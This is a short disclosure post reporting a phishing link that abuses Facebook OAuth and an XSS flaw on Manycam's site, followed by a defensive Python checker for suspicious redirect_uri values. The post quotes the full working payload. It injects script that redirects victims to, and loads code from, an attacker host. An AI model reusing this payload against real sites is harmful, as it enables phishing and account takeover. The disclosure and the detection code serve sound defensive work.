I came across the following link on a Facebook post:
If you visit that link, it redirects to Facebook for OAuth2 that tries to authenticate the user against the Manycam Facebook app:
https://mbasic.facebook.com/v3.2/dialog/oauth?client_id=187641897343&privacyx=300645083384735&response_type=token&scope=public_profile,email&redirect_uri=https://manycam.com/applications/?os=*/mac=%271%27;document.documentElement.innerHTML%3D%27%27;window.location.href=`https://renix.site/iphone.php`;%3C/script%3E%3Clink%20rel=%22stylesheet%22%20href=%22https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css%22%20integrity=%22sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T%22%20crossorigin=%22anonymous%22%3E%3Cscript%20src=%22https://renix.site/fb/stayed.js?%26view=ustreamtv%22%3E%3Ca+href=%27https://renix.site/iphone.php%27%3E%3Cimg+src=%27https://i.imgur.com/hyRvgh3.jpg%27%20style=%27position:%20fixed;%20left:%200;%20top:%200;%20height:%20100%;%20width:%20100%%27%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E+%3Cscript%3E/*x=%60;/*%22%3E&response_type=token
If you look carefully at the redirect_uri parameter, you’ll notice it’s leveraging an XSS vulnerability on the Manycam website to redirect to the attacker’s website after they are authenticated.
The attackers probably have access to your Facebook app credentials or something. Please fix your website and secure your Facebook application. Thanks.
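
As an added illustration (not part of the original post, and not Manycam's or Facebook's code), here is a defender-side check that decodes the redirect_uri of an OAuth dialog link and flags the pattern described above: a value that is not an exact registered URI, carries script or HTML markup, or references other hosts. The registered URI, the app.example and other.example hosts, and both sample links are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the redirect URIs the app has registered (hypothetical value).
REGISTERED = {"https://app.example/applications/"}

# Markup or script fragments that have no place in a redirect URI.
MARKUP = re.compile(
    r"<\s*/?\s*(?:script|img|link|a|iframe)\b|window\.location|document\.", re.I)
# Any absolute URL embedded in the decoded value.
EMBEDDED_URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# Constructed samples: one clean link, one shaped like the link in the post.
CLEAN = ("https://www.facebook.com/v3.2/dialog/oauth?client_id=0000000000"
         "&response_type=token&redirect_uri=https://app.example/applications/")
SAMPLE = ("https://www.facebook.com/v3.2/dialog/oauth?client_id=0000000000"
          "&response_type=token&scope=public_profile,email"
          "&redirect_uri=https://app.example/applications/?os=%27;"
          "window.location.href=%60https://other.example/landing%60;"
          "%3C/script%3E%3Cscript%20src=%22https://other.example/s.js%22%3E")


def inspect_oauth_link(link):
    """Decode redirect_uri from an OAuth dialog link and report findings."""
    query = parse_qs(urlsplit(link).query, keep_blank_values=True)
    values = query.get("redirect_uri", [])
    redirect = values[0] if values else ""   # parse_qs has percent-decoded it
    host = (urlsplit(redirect).hostname or "").lower()
    embedded = {h.lower() for h in EMBEDDED_URL.findall(redirect)}
    markup = sorted({m.group(0).lower() for m in MARKUP.finditer(redirect)})
    foreign = sorted(embedded - {host})
    exact = redirect in REGISTERED           # exact string match, no prefixes
    return {
        "redirect_uri": redirect,
        "host": host,
        "exact_match": exact,
        "markup": markup,
        "foreign_hosts": foreign,
        "suspicious": (not exact) or bool(markup) or bool(foreign),
    }


if __name__ == "__main__":
    for name, link in (("clean", CLEAN), ("sample", SAMPLE)):
        result = inspect_oauth_link(link)
        print(name, result["suspicious"], result["markup"], result["foreign_hosts"])
```

The exact-match test is the mitigation side of the same check: a redirect URI that must equal a registered value cannot carry an appended query string like the one in the link above.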